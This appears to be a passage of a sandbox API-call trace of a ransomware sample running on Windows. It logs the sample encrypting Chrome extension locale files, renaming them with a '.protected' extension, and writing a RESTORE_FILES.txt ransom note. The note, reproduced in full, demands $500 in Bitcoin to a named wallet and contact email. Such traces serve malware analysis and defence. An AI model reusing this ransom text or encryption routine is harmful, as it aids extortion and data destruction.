lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.945] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.945] CloseHandle (hObject=0x164) returned 1 [0083.945] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0083.945] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk") returned 150 [0083.946] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0083.946] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*") returned 152 [0083.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.946] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.946] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.946] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.946] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.946] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\.") returned 152 [0083.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.946] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.946] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.946] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.946] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\..") returned 153 [0083.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0083.946] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.946] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.946] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0083.947] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0083.947] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0083.947] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.947] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.948] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.948] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.948] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.948] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.949] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.949] CloseHandle (hObject=0x168) returned 1 [0083.949] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.protected") returned 174 [0083.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.protected")) returned 1 [0083.949] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.949] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.949] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\RESTORE_FILES.txt") returned 168 [0083.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.950] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.950] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.951] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.951] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.951] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.951] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.951] CloseHandle (hObject=0x164) returned 1 [0083.951] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0083.951] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl") returned 150 [0083.951] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0083.951] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0083.951] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*") returned 152 [0083.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.952] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.952] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.952] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.952] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\.") returned 152 [0083.952] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.952] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.952] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.952] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.952] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.952] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.952] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\..") returned 153 [0083.952] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.952] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.952] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.952] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.952] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.953] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.953] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.954] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.954] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.960] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.960] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.961] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.961] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.961] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.961] CloseHandle (hObject=0x168) returned 1 [0083.961] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.protected") returned 174 [0083.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.protected")) returned 1 [0083.962] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.962] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\RESTORE_FILES.txt") returned 168 [0083.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.962] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.962] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.963] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.963] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 